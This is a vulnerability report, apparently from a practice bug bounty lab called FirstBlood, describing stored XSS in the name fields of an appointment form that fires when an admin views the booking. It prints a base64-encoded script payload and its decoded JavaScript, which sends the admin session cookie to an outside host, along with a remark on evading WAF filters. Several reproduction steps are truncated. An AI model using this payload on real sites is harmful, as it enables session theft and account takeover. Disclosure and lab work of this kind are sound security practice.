FirstBlood-#171 — Stored XSS payload allowed in names when making an appointment can leak admin cookie
On 2021-05-11, xnl-h4ck3r reported:
A stored XSS vulnerability exists that allows an attacker to insert a payload in First name (fname) and/or Surname (lname) on
/book-appointment.htmlthat will fire on the endpoint
/drpanel/drapi/query.phpif an admin views the endpoint directly for that appointment. The payload can leak the admin session cookie to the attacker.
Steps to Reproduce
- Book an appointment on
/book-appointment.htmland set the first name to
<script/src="data:;base64,dmFyIHg9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7eC5vcGVuKCdHRVQnLCcvL3huMS51ay9jPScgKyBkb2N1bWVudC5jb29raWUpO3guc2VuZCgpOw=="></script/x>Set all other fields to anything NOTE: This payload contains a Base64 encoding of
var x=new XMLHttpRequest();x.open('GET','//xn1.uk/c=' + document.cookie);x.send();which gets around various variousWAF filters. A burp collab URL can replace
- Login in as an admin user and go to
- Look at the appointment ypu just made and use dev tools to inspect the element and make note of the
aptid passed to the
getinfofunction, e.g. 56912315:
- Go to
aptidparameter is set the ID found in Step 3.
- Observe the payload fires and the value of cookie
drpsis leaked to the attackers server, e.g.
The impact of this vulnerability is that an attacker could steal the admins
drpscookie, potentially allowing them to perform actions as that user that requrie admin authorisation.
FirstBlood ID: 10
Vulnerability Type: Stored XSS
When creating an appointment, it is possible to get stored XSS /drapi/query.php via the patients name